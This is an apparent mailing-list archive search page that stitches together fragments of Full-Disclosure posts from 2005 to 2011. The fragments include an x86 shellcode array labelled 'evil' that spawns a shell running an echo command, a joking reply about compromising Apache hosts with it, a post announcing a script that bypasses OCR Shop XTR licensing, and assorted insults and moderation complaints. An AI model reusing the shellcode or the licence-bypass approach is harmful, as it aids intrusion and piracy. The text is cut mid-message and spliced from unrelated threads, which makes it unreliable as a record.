char evil[] =
xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89
x76x49x8dx5ex08x89x5ex4dx8dx5ex0bx89x5ex51x89
x46x55xb0x0bx89xf3x8dx4ex49x8dx56x55xcdx80xe8
xd1xffxffxffx2fx62x69x6ex2fx73x68x23x2dx63x23
x2fx62x69x6ex2fx65x63x68x6fx20x77x30x30x30x74
PM,
xD 0x41 wrote:
yer it is clarly leet stuff dude...
i ran it and
got liek 2000k2.2.* apache user bot in a night! :P
hgehe
(jkin)
funny tho.
xd
On 5 October 2011 13:09, VeNoMouS
wrote:
char evil[] =
xebx2ax5ex31xc0x88x46x07x88x46x0ax88x46x47x89
We are aware there is a major backlog/delay and we are attempting to do
something about that at the moment...
- VeNoMouS
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of xsr
Sent: Tuesday, 20 October 2009 9
Site was being dos'd
-Original Message-
From: full-disclosure-boun...@lists.grok.org.uk
[mailto:full-disclosure-boun...@lists.grok.org.uk] On Behalf Of Armando
Oliveira
Sent: Friday, 16 October 2009 11:37 p.m.
To: Killian Faughnan
Cc: full-disclosure@lists.grok.org.uk
Subject: Re:
This code bypasses the OCR Shop XTR vvlicense - http://www.vividata.com/be_xtr_overview.html.
- VeNoMouS
ocrshopxtr_freebie.pl
Description: Binary data
___
Full-Disclosure - We believe in it.
Charter: http://lists.grok.org.uk/full
it reminds you of #teen or something from irc, ure a dick , no your a
dick
just ignore him ffs! unless your wanting your own pok`e mon to battle him
with your enormous e-penis!!
- Original Message -
From: adnan habib [EMAIL PROTECTED]
To: [EMAIL PROTECTED];
OMG HAI!!!, Wow your job is almost complete, all you have to do now is find
some one in the list that actually cares!!
- Original Message -
From: n3td3v [EMAIL PROTECTED]
To: [EMAIL PROTECTED]; full-disclosure@lists.grok.org.uk
Sent: Sunday, November 27, 2005 6:33 PM
Subject: Re:
OMFG HAI !!! GOT ./ !!!
- Original Message -
From:
Phrack High Council
To: full-disclosure@lists.grok.org.uk
Sent: Thursday, November 24, 2005 1:29
PM
Subject: [Full-disclosure] Return of the
Phrack High Council
Dear FD Reader, It's been a very long
time
In reguads to the the curl, I have just checked all the php curl code this was fixed in 4.3.10 from
what i can see, because iwrote a patch to stop the openbase dir in
curluntil php fixed it, i submited it along time ago but the php dev's
were all "blah blah blah 3rd party software blah blah
Nah I'm sorry, But I gotta agree with Enrico, this list has way to many
kids on it now, fuck i dont even bother opening my full-disclosure folder
half the time now cause i know its full of crap. some one does needa pull
finger and do some cleaning in reguards to moderation.
If it keeps going
We got this email @ milw0rm today, htf can
someone bitch this much forposting their exploit I think its
kinda retarded that they release it but it MUST come from only there website,
GOT M$ tactics??
-Original Message-
From: sd luser [EMAIL PROTECTED]Date: Wed, 23 Mar
2005
my god you need a slap for being so stupid, its only the latest dev src
compiled, which has always been freely available, im in with barrie on this
one..
- Original Message -
From: Thierry Zoller [EMAIL PROTECTED]
To: Barrie Dempster [EMAIL PROTECTED]
Cc:
well DUH
- Original Message -
From: cyberpixl [EMAIL PROTECTED]
To: Lennart Hansen [EMAIL PROTECTED]
Cc: full-disclosure@lists.grok.org.uk
Sent: Friday, March 18, 2005 12:27 PM
Subject: Re: [Full-disclosure] new BIG vulnerability in libc found!
is this a joke? =P
On Wed, 09 Mar 2005
13 matches
Mail list logo